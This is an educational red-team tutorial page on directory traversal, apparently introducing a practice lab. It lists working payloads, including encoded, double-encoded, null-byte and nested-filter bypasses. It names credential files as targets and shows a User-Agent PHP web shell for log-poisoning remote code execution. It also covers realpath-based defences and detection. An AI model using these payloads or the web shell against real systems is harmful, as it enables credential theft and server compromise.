Directory Traversal — Learn

Red Team · Easy

Directory Traversal

Understand how attackers escape the web root using path manipulation, access sensitive server files, and what developers must do to prevent it.

Easy Red Team Path ⏱ 16 min read

Learning Progress

What is it?

Path Traversal Explained

A directory traversal vulnerability (also called path traversal or dot-dot-slash) allows an attacker to read files on the server that sit outside the intended web root directory. If a web application uses user-supplied input to construct file paths without proper sanitisation, an attacker can manipulate that input to access arbitrary files.

The classic payload is ../ — each ../ moves one directory up in the file system. By chaining these together, an attacker can reach the system root and read files like /etc/passwd, application configuration files, or private keys. In some cases, traversal leads directly to remote code execution when it can be combined with file upload or log poisoning techniques.

⚠️Real-world impact: Directory traversal has been used to leak source code, database credentials, SSH private keys, and cloud API tokens from production servers. It appears regularly in CVE databases and is consistently found in penetration tests of web applications that handle file operations.

Foundations

How File Systems and Web Roots Work — and Why the Gap Exists

To understand directory traversal, you need a clear mental model of how web servers relate to the file system they run on. A web server is configured with a "document root" — a specific directory that it treats as the top-level location for serving files. Requests are supposed to map only to files within that directory. Everything outside it — system files, application source code, configuration files, private keys — is supposed to be invisible to the web.

The filing cabinet analogy: Imagine a company has thousands of filing cabinets throughout the building: personnel records in HR, financial records in accounting, contracts in legal, and a public-facing brochure rack in the lobby. The receptionist is authorised to hand out anything from the lobby brochure rack when visitors ask. A directory traversal vulnerability is like a receptionist who, when asked for "brochure number 5," blindly follows any path the visitor specifies. Ask for "../../../HR/personnel/employee_salaries" and the receptionist walks to the HR department and retrieves it — because they never verify that the path stays within the lobby. The access boundary exists in policy, but not in implementation.

The technical reason this happens is straightforward: operating systems resolve relative path components before the application can validate them. When the server constructs a file path like /var/www/files/ + user input, and user input contains ../../../etc/passwd, the OS resolves the combined path to /etc/passwd before the application knows what happened. The application never sees the traversal — it just sees a valid resolved path.

What Lives Outside the Web Root — The High-Value Targets

The value of a directory traversal vulnerability depends on what sensitive files are accessible from the server. Understanding the typical Linux server file system layout is essential for knowing what to reach for:

/etc/passwd — User account list. Not passwords directly (those are in /etc/shadow which requires root), but reveals usernames, home directories, and shell paths — useful for targeted attacks.
/etc/shadow — Hashed passwords for all system users. Readable only by root — confirming traversal to this file means the web process runs as root, which is itself a critical finding.
/etc/nginx/nginx.conf, /etc/apache2/apache2.conf — Web server configuration. Reveals virtual host configurations, upstream proxies, authentication mechanisms, and other application endpoints.
~/.ssh/id_rsa — SSH private key of the web server user. If readable, grants direct SSH access to the server without a password.
.env — Environment variables file used by many modern frameworks (Laravel, Django, Node.js). Typically contains database credentials, API keys, secret keys, and cloud provider tokens.
Application source code — /var/www/app/config/database.php, /app/config.py — Hard-coded credentials, database connection strings, secret keys for signing tokens.
/proc/self/environ — Process environment variables for the running web process. Often contains secrets passed as environment variables in container environments.
/var/log/apache2/access.log — Web server access log. Useful for log poisoning attacks that combine traversal with RCE.

🚨Cloud environments: In AWS, GCP, and Azure deployments, the instance metadata endpoint at http://169.254.169.254/ returns IAM credentials, instance identity, and configuration data. A Server-Side Request Forgery (SSRF) vulnerability — which is conceptually related to path traversal — can reach this endpoint and exfiltrate cloud credentials with account-level impact. Always test for SSRF alongside traversal in cloud environments.

How it works

The Mechanics

Consider a web application that serves user-selected files like this:

Vulnerable URL

https://target.com/download?file=report.pdf

The server constructs a path like: /var/www/files/report.pdf and returns the contents. Behind the scenes, the server code likely looks something like:

Vulnerable Server-Side Code (PHP example)

// Vulnerable: user input concatenated directly into path
$filename = $_GET['file'];
$path = "/var/www/files/" . $filename;
echo file_get_contents($path);
// No validation that $filename stays within /var/www/files/

If an attacker changes the parameter to a traversal sequence, the OS resolves it before the code runs:

Traversal Payload

https://target.com/download?file=../../../../etc/passwd
# Server constructs: /var/www/files/../../../../etc/passwd
# OS normalises to:   /etc/passwd
# file_get_contents reads and returns /etc/passwd contents

Web applications often try to block this by filtering ../. Attackers have developed many bypass techniques to evade these naive filters — the root problem is that filtering strings is not the same as enforcing path boundaries.

💡Windows path traversal: On Windows servers, the backslash ..\ is the equivalent traversal character. Windows also resolves forward slashes in paths, so ../ often works on Windows too. Windows-specific targets include C:\Windows\System32\drivers\etc\hosts, C:\inetpub\wwwroot\web.config, and C:\Windows\win.ini (a classic confirmation target because it's always present).

Examples

Payloads in Practice

Example 01Basic Traversal — No Filtering

The most basic payload — works when no filtering is in place. The number of ../ sequences needed depends on how deep the web root is in the file system. Using more than needed is harmless — you can't traverse above the filesystem root. Six is usually sufficient to reach root from any realistic web root depth.

?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
# www-data entry confirms web server runs as www-data — expected
# Any account with /bin/bash shell is a potential lateral movement target

Example 02URL-Encoded Bypass

When the server filters the literal string ../, URL-encoding the characters bypasses the string match. The web server or framework decodes the URL before passing the parameter to the application, so the application receives the decoded traversal sequence — but the string filter already checked the encoded version and found no match.

The invisible ink analogy: The filter is looking for visible blue pen markings. Writing the same message in invisible ink passes the filter. The reader (the OS path resolver) still reads the ink. URL encoding is invisible ink for string filters.

?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
# %2e = .  (dot)
# %2f = /  (forward slash)
# Decodes to: ../../etc/passwd
# String filter saw: %2e%2e%2f — no match for "../" — passes
# OS receives: ../../etc/passwd — traversal executes

# Variant: encode only the slash, leave dots literal
?file=..%2f..%2fetc%2fpasswd

# Variant: encode only the dots
?file=%2e./%2e./etc/passwd

Example 03Double-Encoded Bypass

Some WAFs and security filters decode the URL once before checking it, then the application server decodes it a second time. Double encoding exploits this two-decode pipeline: the filter checks the single-decoded version (still encoded), passes it, and the application receives the fully decoded traversal sequence.

# %25 is the URL encoding of % itself
?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd
# WAF decodes once: %2e%2e%2f%2e%2e%2fetc%2fpasswd  — no "../" → passes
# App server decodes again: ../../etc/passwd → traversal executes

# Breakdown:
# %25 2e → %2e → .
# %25 2f → %2f → /

Example 04Null Byte Termination — Legacy PHP

In PHP versions prior to 5.3.4, the null byte (%00) in a string terminated it at the C language level, even if PHP continued processing. This allowed bypassing extension checks: the application validates that the filename ends in .jpg, but the OS opens the file up to the null byte, ignoring everything after it.

?file=../../../../etc/passwd%00.jpg
# PHP extension check: filename ends in ".jpg" → passes validation
# C-level fopen() call: string terminates at \x00 → opens /etc/passwd
# The ".jpg" suffix is never seen by the OS

# Modern PHP is not vulnerable — patched in PHP 5.3.4 (2010)
# Still relevant for: legacy apps, embedded systems, some ICS software

Example 05Filter Stripping Bypass — Recursive Removal

Some developers implement traversal filters by removing ../ from user input rather than rejecting the request. If the removal is not recursive, an attacker can nest the traversal sequence so that removing the inner ../ reconstructs it from the outer characters.

The word puzzle analogy: If a filter removes the word "bad" from every string, submitting "bbadad" produces "bad" after the first removal pass. The filter ran once and stopped. Nested traversal payloads work the same way.

# Filter removes "../" once, left to right
?file=....//....//etc/passwd
# Filter removes the inner "../": ....// → ../ after removal
# Result after filtering: ../../etc/passwd → traversal executes

# Variant with backslashes (mixed OS-style):
?file=..././..././etc/passwd
# Remove "../": ././ → still traverses on some OS path resolvers

Example 06Absolute Path Injection

Some applications filter relative traversal sequences (../) but don't prevent absolute paths. If the user-controlled parameter is passed directly to a file-reading function without any path prefix being prepended, supplying an absolute path bypasses traversal filters entirely — there's nothing to traverse.

# Application code (vulnerable):
$path = filter_traversal($_GET['file']);  // removes "../"
readfile($path);                          // but accepts absolute paths!

# Payload — no traversal needed, absolute path used directly:
?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash ...

# Also try:
?file=/etc/nginx/nginx.conf     → web server config + virtual hosts
?file=/home/ubuntu/.ssh/id_rsa  → SSH private key → direct server access
?file=/var/www/html/.env        → application secrets

Real-World Scenarios

Traversal in Production Environments

Scenario AThe Document Download Portal — Credentials in .env

A healthcare company runs a document management portal that allows authenticated users to download their own records. The download endpoint takes a filename parameter and serves files from /var/www/portal/documents/. A penetration tester notices the parameter in Burp and tests a basic traversal payload.

The /etc/passwd attempt returns content, confirming the vulnerability. Moving up the chain, the tester tries ../../../../var/www/portal/.env — the application's environment variable file. It contains the database hostname, username, and password, the application's JWT secret key (allowing arbitrary token forging), and an AWS S3 access key with access to the company's document storage bucket.

From one traversal vulnerability in a download endpoint, the tester has: database credentials, the ability to forge auth tokens as any user, and cloud storage access containing every patient document in the system. This is a complete data breach from a single file read.

🚨HIPAA implication: Reading a .env file that contains credentials to a database holding PHI constitutes unauthorised access to protected health information. This is a reportable breach under HIPAA even if no patient records were directly read via the traversal.

Scenario BTraversal to Remote Code Execution via Log Poisoning

An attacker finds directory traversal on a PHP application and can read /var/log/nginx/access.log. The attacker then sends a crafted HTTP request where the User-Agent header contains PHP code: User-Agent: <?php system($_GET['cmd']); ?>. This request is logged verbatim to the access log.

Now the attacker uses the traversal to read the log file, but appends a command parameter: ?file=../../../../var/log/nginx/access.log&cmd=id. The PHP interpreter, which processes the file being read, executes the embedded code. The server runs id and its output appears in the response. Directory traversal has escalated to Remote Code Execution.

This chain — traversal → log poisoning → RCE — is a well-documented attack pattern. It elevates traversal from a "file disclosure" finding to a "full server compromise" finding and changes the CVSS score from High to Critical.

Scenario CCVE in a Widely-Used Library — Scale at Production

Traversal vulnerabilities are not only found by testers in custom applications — they appear in widely-used software packages and are assigned CVEs that affect thousands of deployments simultaneously. CVE-2021-41773 (Apache HTTP Server 2.4.49) was a path traversal vulnerability that allowed unauthenticated attackers to read files outside the document root and, in configurations with CGI enabled, execute arbitrary code. It was exploited in the wild within hours of disclosure.

A similar pattern occurred with CVE-2019-18935 (Telerik UI for ASP.NET), CVE-2018-1000600 (Jenkins), and multiple Cisco, Fortinet, and Pulse Secure VPN products. Each affected organisations that were running unpatched software. The lesson for defenders: directory traversal is not only a custom code problem. Dependency and network appliance patch management is equally important.

⚠️Detection note: Traversal attempts are highly detectable in web server logs — strings like ../, %2e%2e, and /etc/passwd in request parameters are unambiguous attack signatures. Web Application Firewalls and SIEM rules for these strings should be standard in any security monitoring setup.

Security Implications

What Path Traversal Means for Infrastructure Security

A single traversal vulnerability is a master key. Every file readable by the web server process is exposed: configuration files, credentials, source code, private keys, log files. The scope is not limited to "some user data" — it's the entire server file system accessible to the process.
Traversal findings often cascade. Credentials found in .env files unlock databases, cloud accounts, and third-party APIs. SSH keys found in home directories unlock direct shell access. JWT secrets found in config files unlock authentication bypasses. A single traversal exploit often yields multiple critical follow-on findings.
Principle of least privilege limits blast radius. The web server process should run as a user with the minimum permissions needed — no access to SSH keys, no access to other users' home directories, no read access to files outside the web root. If the web process can't read /etc/shadow, traversal to it fails regardless of whether the vulnerability exists. Process isolation and file permissions are a critical compensating control.
The correct fix is allowlist-based path validation. Filtering ../ is a blocklist approach and will always be bypassable with new encodings and techniques. The correct defence: resolve the full canonical path first using realpath() or equivalent, then verify the resolved path starts with the intended base directory. If it doesn't match, reject the request. This approach is encoding-agnostic and filter-bypass-proof.

💡Secure fix example: $base = '/var/www/files/'; $real = realpath($base . $input); if (strpos($real, $base) !== 0) { die('Access denied'); } — this resolves all traversal sequences before checking the path, making encoding bypasses irrelevant.

Key Concepts

What You Need to Know

📁

Web Root

The directory a web server is configured to serve files from. Traversal attacks escape this boundary to reach the broader file system — system configs, keys, application secrets.

🔗

Path Normalisation

The OS resolves ../ before the application sees it. Secure code must normalise (canonicalise) paths first with realpath() then validate — not filter strings before normalisation.

🛡️

Allowlist Validation

The correct fix: resolve the full canonical path, then verify it starts with the intended base directory. This is encoding-agnostic and immune to all bypass techniques.

🎯

High-Value Targets

/etc/passwd, .env, SSH keys, web server configs, application source, /proc/self/environ. Each can cascade into further compromise.

🔒

Least Privilege

Web processes running as root make traversal catastrophic. Running as a dedicated low-privilege user limits accessible files to only what the web app needs — containment by design.

🧪

Log Poisoning RCE

Traversal + writable log file = potential RCE. Inject PHP into a log via User-Agent, then read the log via traversal. Escalates from file disclosure (High) to code execution (Critical).

🖥️

Windows Traversal

Use ..\ on Windows servers. Target C:\Windows\win.ini for confirmation, web.config for credentials.

📡

CVE Awareness

Traversal appears in CVEs for web servers, VPNs, and frameworks — not only custom code. Apache 2.4.49, Telerik UI, and Cisco ASA are documented examples. Patch management is a traversal defence.

💡OWASP: Directory traversal falls under A01:2021 Broken Access Control — the top web application security risk. The inability to enforce file access boundaries is a fundamental access control failure.

Ready to put it into practice?

Proceed to the Lab

You've covered the theory. Now apply it hands-on in the simulated environment.

Start Lab — Directory Traversal →
← Return to all labs